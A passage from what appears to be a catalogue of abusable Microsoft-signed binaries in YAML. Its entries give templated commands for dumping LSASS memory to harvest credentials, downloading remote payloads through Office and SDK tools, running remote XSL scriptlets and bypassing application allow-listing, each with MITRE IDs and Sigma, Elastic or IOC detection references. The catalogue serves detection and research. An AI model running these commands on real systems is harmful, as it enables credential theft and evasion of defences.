  - IOC: Event ID 4688 - dsdbutil.exe process creation
  - IOC: Event ID 4663 - Regular and Volume Shadow Copy attempts to read or modify ntds.dit
  - IOC: Event ID 4656 - Regular and Volume Shadow Copy attempts to read or modify ntds.dit
Resources:
  - Link: https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358
  - Link: https://www.netwrix.com/ntds_dit_security_active_directory.html
Acknowledgement:
  - Person: bohops
    Handle: '@bohops'
  - Person: Ekitji
    Handle: '@eki_erk'

================================================
FILE: yml/OtherMSBinaries/Dtutil.yml
================================================
---
Name: dtutil.exe
Description: Microsoft command-line utility used to manage SQL Server Integration Services packages.
Author: Avihay Eldad
Created: 2024-06-17
Commands:
  - Command: dtutil.exe /FILE {PATH_ABSOLUTE:.source.ext} /COPY FILE;{PATH_ABSOLUTE:.dest.ext}
    Description: Copy a file from source to destination
    Usecase: Copies the source file to the destination file
    Category: Copy
    Privileges: Administrator
    MitreID: T1105
    OperatingSystem: Windows
Full_Path:
  - Path: C:\Program Files\Microsoft SQL Server\\DTS\Binn\dtutil.exe
  - Path: C:\Program Files (x86)\Microsoft SQL Server\\DTS\Binn\dtutil.exe
Resources:
  - Link: https://learn.microsoft.com/en-us/sql/integration-services/dtutil-utility?view=sql-server-ver16
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'

================================================
FILE: yml/OtherMSBinaries/Dump64.yml
================================================
---
Name: Dump64.exe
Description: Memory dump tool that comes with Microsoft Visual Studio
Author: mr.d0x
Created: 2021-11-16
Commands:
  - Command: dump64.exe {PID} out.dmp
    Description: Creates a memory dump of the LSASS process (pass the PID of lsass.exe).
    Usecase: Create a memory dump and parse it offline to retrieve credentials.
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.001
    OperatingSystem: Windows 10, Windows 11
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\dump64.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml
  - IOC: As a Visual Studio installer binary, its execution on a non-developer system may be suspicious
Resources:
  - Link: https://twitter.com/mrd0x/status/1460597833917251595
Acknowledgement:
  - Person: mr.d0x
    Handle: '@mrd0x'

================================================
FILE: yml/OtherMSBinaries/DumpMinitool.yml
================================================
---
Name: DumpMinitool.exe
Description: Dump tool that is part of Visual Studio 2022
Author: mr.d0x
Created: 2022-01-20
Commands:
  - Command: DumpMinitool.exe --file {PATH_ABSOLUTE} --processId 1132 --dumpType Full
    Description: Creates a memory dump of the lsass process (1132 stands for the PID of lsass.exe)
    Usecase: Create a memory dump and parse it offline
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.001
    OperatingSystem: Windows 10, Windows 11
Full_Path:
  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml
Resources:
  - Link: https://twitter.com/mrd0x/status/1511415432888131586
Acknowledgement:
  - Person: mr.d0x
    Handle: '@mrd0x'

================================================
FILE: yml/OtherMSBinaries/Dxcap.yml
================================================
---
Name: Dxcap.exe
Description: DirectX diagnostics/debugger included with Visual Studio.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: Dxcap.exe -c {PATH_ABSOLUTE:.exe}
    Description: 'Launch the specified executable as a subprocess of dxcap.exe. Note that you need write permissions in the current working directory for the command to succeed; alternatively, add ''-file c:\path\to\writable\location.ext'' as the first argument.'
    Usecase: Local execution of a process as a subprocess of dxcap.exe
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: EXE
  - Command: dxcap.exe -usage
    Description: Once executed, `dxcap.exe` runs `xperf.exe` from its own folder. Thus, if `dxcap.exe` is copied to a folder and an arbitrary executable in that folder is renamed to `xperf.exe`, `dxcap.exe` will spawn it.
    Usecase: Execute an arbitrary executable via a trusted system executable.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
      - Requires: Rename
Full_Path:
  - Path: C:\Windows\System32\dxcap.exe
  - Path: C:\Windows\SysWOW64\dxcap.exe
Code_Sample:
  - Code: https://gist.github.com/ghosts621/1d0e0f43f7288c826035d5d011b6ca51
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml
  - IOC: dxcap.exe executing from outside of System32/SysWOW64
  - IOC: dxcap.exe spawning xperf.exe
  - IOC: xperf.exe executing from unusual directories (i.e. not from the ADK path)
Resources:
  - Link: https://twitter.com/harr0ey/status/992008180904419328
Acknowledgement:
  - Person: Matt harr0ey
    Handle: '@harr0ey'
  - Person: Vikas Singh
    Handle: '@vikas891'
  - Person: Naor Evgi
    Handle: '@ghosts621'

================================================
FILE: yml/OtherMSBinaries/ECMangen.yml
================================================
---
Name: ECMangen.exe
Description: Command-line tool for managing certificates in Microsoft Exchange Server.
Author: Avihay Eldad
Created: 2024-04-30
Commands:
  - Command: ECMangen.exe {REMOTEURL}
    Description: Downloads a payload from a remote server
    Usecase: Downloads a remote payload and places it in INetCache
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\\Bin\ECMangen.exe
  - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\\Bin\x64\ECMangen.exe
  - Path: C:\Program Files\Microsoft\Exchange Server\\Bin\ECMangen.exe
  - Path: C:\Program Files\Microsoft\Exchange Server\Bin\ECMangen.exe
  - Path: C:\Program Files\Microsoft\Exchange Server\ClientAccess\Bin\ECMangen.exe
  - Path: C:\ExchangeServer\Bin\ECMangen.exe
Detection:
  - IOC: URL on an ECMangen command line
  - IOC: ECMangen making unexpected network connections or DNS requests
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'

================================================
FILE: yml/OtherMSBinaries/Excel.yml
================================================
---
Name: Excel.exe
Description: Microsoft Office binary
Author: 'Reegun J (OCBC Bank)'
Created: 2019-07-19
Commands:
  - Command: Excel.exe {REMOTEURL}
    Description: Downloads a payload from a remote server
    Usecase: Downloads a remote payload and places it in INetCache.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe
  - Path: C:\Program Files\Microsoft Office\Office16\Excel.exe
  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe
  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe
  - Path: C:\Program Files\Microsoft Office\Office15\Excel.exe
  - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe
  - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe
  - Path: C:\Program Files\Microsoft Office\Office14\Excel.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
  - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml
  - IOC: Suspicious Office application Internet/network traffic
Resources:
  - Link: https://twitter.com/reegun21/status/1150032506504151040
  - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Acknowledgement:
  - Person: 'Reegun J (OCBC Bank)'
    Handle: '@reegun21'

================================================
FILE: yml/OtherMSBinaries/Fsi.yml
================================================
---
Name: Fsi.exe
Description: 64-bit F# (FSharp) interpreter included with Visual Studio and the .NET Core SDK.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
  - Command: fsi.exe {PATH:.fsscript}
    Description: Execute F# code via script file
    Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
    Category: AWL Bypass
    Privileges: User
    MitreID: T1059
    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
    Tags:
      - Execute: FSharp
  - Command: fsi.exe
    Description: Execute F# code via interactive command line
    Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
    Category: AWL Bypass
    Privileges: User
    MitreID: T1059
    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
    Tags:
      - Execute: FSharp
Full_Path:
  - Path: C:\Program Files\dotnet\sdk\\FSharp\fsi.exe
  - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
Code_Sample:
  - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
Detection:
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - IOC: Fsi.exe execution may be suspicious on non-developer machines
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml
Resources:
  - Link: https://twitter.com/NickTyrer/status/904273264385589248
  - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
  - Person: Nick Tyrer
    Handle: '@NickTyrer'
  - Person: Jimmy
    Handle: '@bohops'
================================================
FILE: yml/OtherMSBinaries/FsiAnyCpu.yml
================================================
---
Name: FsiAnyCpu.exe
Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
  - Command: fsianycpu.exe {PATH:.fsscript}
    Description: Execute F# code via script file
    Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
    Category: AWL Bypass
    Privileges: User
    MitreID: T1059
    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
    Tags:
      - Execute: FSharp
  - Command: fsianycpu.exe
    Description: Execute F# code via interactive command line
    Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
    Category: AWL Bypass
    Privileges: User
    MitreID: T1059
    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
    Tags:
      - Execute: FSharp
Full_Path:
  - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
Code_Sample:
  - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
Detection:
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml
Resources:
  - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
  - Person: Nick Tyrer
    Handle: '@NickTyrer'
  - Person: Jimmy
    Handle: '@bohops'

================================================
FILE: yml/OtherMSBinaries/IntelliTrace.yml
================================================
---
Name: IntelliTrace.exe
Description: Visual Studio command-line tool for collecting and managing diagnostic trace files.
Author: Avihay Eldad
Created: 2025-09-21
Commands:
  - Command: IntelliTrace.exe launch /cp:"collectionplan.xml" /f:"c:\users\public\log" "C:\Windows\System32\calc.exe"
    Description: Launches an executable via the Visual Studio command-line utility.
    Usecase: Executes an executable under a trusted Microsoft signed binary.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\IntelliTrace\IntelliTrace.exe
  - Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\IntelliTrace\IntelliTrace.exe
Resources:
  - Link: https://learn.microsoft.com/en-us/visualstudio/debugger/intellitrace
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'

================================================
FILE: yml/OtherMSBinaries/Logger.yml
================================================
---
Name: Logger.exe
Description: A logging configuration tool from the Windows Kits used to start and manage process logging.
Author: Avihay Eldad
Created: 2025-07-13
Commands:
  - Command: logger.exe RUN "{CMD}"
    Description: Executes the command specified after the `RUN` parameter as a child of `logger.exe`.
    Usecase: Executes an arbitrary command via a signed binary to evade detection.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows
    Tags:
      - Execute: CMD
  - Command: logger.exe RUNW "{CMD}"
    Description: Executes the command specified after the `RUNW` parameter as a child of `logger.exe`.
    Usecase: Executes an arbitrary command via a signed binary to evade detection.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows
    Tags:
      - Execute: CMD
  - Command: logger.exe "{CMD}"
    Description: Executes the command specified as a child of `logger.exe`.
    Usecase: Executes an arbitrary command via a signed binary to evade detection.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows
    Tags:
      - Execute: CMD
Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\logger.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\logger.exe
  - Path: C:\Program Files\Windows Kits\10\Debuggers\x86\logger.exe
  - Path: C:\Program Files\Windows Kits\10\Debuggers\x64\logger.exe
Resources:
  - Link: https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/logger
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'

================================================
FILE: yml/OtherMSBinaries/Mftrace.yml
================================================
---
Name: Mftrace.exe
Description: Trace log generation tool for Media Foundation Tools.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: Mftrace.exe {PATH:.exe}
    Description: Launch specified executable as a subprocess of Mftrace.exe.
    Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86\mftrace.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64\mftrace.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\bin\x86\mftrace.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\bin\x64\mftrace.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml
Resources:
  - Link: https://twitter.com/0rbz_/status/988911181422186496
Acknowledgement:
  - Person: fabrizio
    Handle: '@0rbz_'

================================================
FILE: yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml
================================================
---
Name: Microsoft.NodejsTools.PressAnyKey.exe
Description: Part of the NodeJS Visual Studio tools.
Author: mr.d0x
Created: 2022-01-20
Commands:
  - Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 {PATH:.exe}
    Description: Launch specified executable as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.
    Usecase: Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
  - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml
Resources:
  - Link: https://twitter.com/mrd0x/status/1463526834918854661
Acknowledgement:
  - Person: mr.d0x
    Handle: '@mrd0x'

================================================
FILE: yml/OtherMSBinaries/Mpiexec.yml
================================================
---
Name: Mpiexec.exe
Description: Command-line tool for running Message Passing Interface (MPI) applications.
Author: Avihay Eldad
Created: 2025-09-25
Commands:
  - Command: mpiexec.exe {CMD}
    Description: Executes a command via the MPI command-line tool.
    Usecase: Executes commands under a trusted, Microsoft signed binary.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: CMD
Full_Path:
  - Path: C:\Program Files\Microsoft MPI\Bin\mpiexec.exe
  - Path: C:\Program Files (x86)\Microsoft MPI\Bin\mpiexec.exe
Resources:
  - Link: https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'

================================================
FILE: yml/OtherMSBinaries/Msaccess.yml
================================================
---
Name: MSAccess.exe
Description: Microsoft Office component
Author: Nir Chako
Created: 2023-04-30
Commands:
  - Command: MSAccess.exe {REMOTEURL}
    Description: Downloads payload from remote server
    Usecase: It will download a remote payload (if it has the filename extension .mdb) and place it in INetCache.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSAccess.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSAccess.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office16\MSAccess.exe
  - Path: C:\Program Files\Microsoft Office\Office16\MSAccess.exe
  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSAccess.exe
  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSAccess.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office15\MSAccess.exe
  - Path: C:\Program Files\Microsoft Office\Office15\MSAccess.exe
  - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSAccess.exe
  - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSAccess.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSAccess.exe
  - Path: C:\Program Files\Microsoft Office\Office14\MSAccess.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office12\MSAccess.exe
  - Path: C:\Program Files\Microsoft Office\Office12\MSAccess.exe
Detection:
  - IOC: URL on an MSAccess command line
  - IOC: MSAccess making unexpected network connections or DNS requests
Acknowledgement:
  - Person: Nir Chako
    Handle: '@C_h4ck_0'

================================================
FILE: yml/OtherMSBinaries/Msdeploy.yml
================================================
---
Name: Msdeploy.exe
Description: Microsoft tool used to deploy Web Applications.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="{PATH_ABSOLUTE:.bat}"
    Description: Launch .bat file via msdeploy.exe.
    Usecase: Local execution of batch file using msdeploy.exe.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server
    Tags:
      - Execute: CMD
  - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="{PATH_ABSOLUTE:.bat}"
    Description: Launch .bat file via msdeploy.exe.
    Usecase: Local execution of batch file using msdeploy.exe.
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server
    Tags:
      - Execute: CMD
  - Command: msdeploy.exe -verb:sync -source:filePath={PATH_ABSOLUTE:.source.ext} -dest:filePath={PATH_ABSOLUTE:.dest.ext}
    Description: Copy file from source to destination.
    Usecase: Copy file.
    Category: Copy
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server
Full_Path:
  - Path: C:\Program Files\IIS\Microsoft Web Deploy V2\msdeploy.exe
  - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V2\msdeploy.exe
  - Path: C:\Program Files\IIS\Microsoft Web Deploy V3\msdeploy.exe
  - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
  - Path: C:\Program Files\IIS\Microsoft Web Deploy V4\msdeploy.exe
  - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V4\msdeploy.exe
  - Path: C:\Program Files\IIS\Microsoft Web Deploy V5\msdeploy.exe
  - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V5\msdeploy.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml
Resources:
  - Link: https://twitter.com/pabraeken/status/995837734379032576
  - Link: https://twitter.com/pabraeken/status/999090532839313408
Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'

================================================
FILE: yml/OtherMSBinaries/MsoHtmEd.yml
================================================
---
Name: MsoHtmEd.exe
Description: Microsoft Office component
Author: Nir Chako
Created: 2022-07-24
Commands:
  - Command: MsoHtmEd.exe {REMOTEURL}
    Description: Downloads payload from remote server
    Usecase: It will download a remote payload and place it in INetCache.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml
  - IOC: Suspicious Office application internet/network traffic
Acknowledgement:
  - Person: Nir Chako (Pentera)
    Handle: '@C_h4ck_0'

================================================
FILE: yml/OtherMSBinaries/Mspub.yml
================================================
---
Name: Mspub.exe
Description: Microsoft Publisher
Author: Nir Chako
Created: 2022-08-02
Commands:
  - Command: mspub.exe {REMOTEURL}
    Description: Downloads payload from remote server
    Usecase: It will download a remote payload and place it in INetCache.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office16\MSPUB.exe
  - Path: C:\Program Files\Microsoft Office\Office16\MSPUB.exe
  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSPUB.exe
  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSPUB.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office15\MSPUB.exe
  - Path: C:\Program Files\Microsoft Office\Office15\MSPUB.exe
  - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSPUB.exe
  - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSPUB.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe
  - Path: C:\Program Files\Microsoft Office\Office14\MSPUB.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml
  - IOC: Suspicious Office application internet/network traffic
Acknowledgement:
  - Person: 'Nir Chako (Pentera)'
    Handle: '@C_h4ck_0'

================================================
FILE: yml/OtherMSBinaries/Msxsl.yml
================================================
---
Name: msxsl.exe
Description: Command line utility used to perform XSL transformations.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: msxsl.exe {PATH:.xml} {PATH:.xsl}
    Description: Run COM Scriptlet code within the script.xsl file (local).
    Usecase: Local execution of script stored in XSL file.
    Category: Execute
    Privileges: User
    MitreID: T1220
    OperatingSystem: Windows
    Tags:
      - Execute: XSL
  - Command: msxsl.exe {PATH:.xml} {PATH:.xsl}
    Description: Run COM Scriptlet code within the script.xsl file (local).
    Usecase: Local execution of script stored in XSL file.
    Category: AWL Bypass
    Privileges: User
    MitreID: T1220
    OperatingSystem: Windows
    Tags:
      - Execute: XSL
  - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl}
    Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
    Usecase: Local execution of a remote script stored in an XSL file, served as an XML file.
    Category: Execute
    Privileges: User
    MitreID: T1220
    OperatingSystem: Windows
    Tags:
      - Execute: XSL
      - Execute: Remote
  - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml}
    Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
    Usecase: Local execution of a remote script stored in an XSL file, served as an XML file.
    Category: AWL Bypass
    Privileges: User
    MitreID: T1220
    OperatingSystem: Windows
    Tags:
      - Execute: XSL
      - Execute: Remote
  - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}
    Description: Using remote XML and XSL files, save the transformed XML file to disk.
    Usecase: Download a file from the internet and save it to disk.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows
  - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-name
    Description: Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS).
    Usecase: Download a file from the internet and save it to an NTFS Alternate Data Stream.
    Category: ADS
    Privileges: User
    MitreID: T1564
    OperatingSystem: Windows
Full_Path:
  - Path: no default
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
Resources:
  - Link: https://twitter.com/subTee/status/877616321747271680
  - Link: https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
  - Link: https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file
Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
  - Person: Ronnie Salomonsen
    Handle: '@r0ns3n'

================================================
FILE: yml/OtherMSBinaries/Nmcap.yml
================================================
---
Name: Nmcap.exe
Description: Command-line packet capture utility from Microsoft Network Monitor 3.x.
Author: Avihay Eldad
Created: 2025-09-16
Commands:
  - Command: nmcap.exe /network * /capture /file {PATH_ABSOLUTE:.cap}
    Description: |
      Start capture on all network adapters and save to the specified .cap (circular) file. Optionally, one can add:
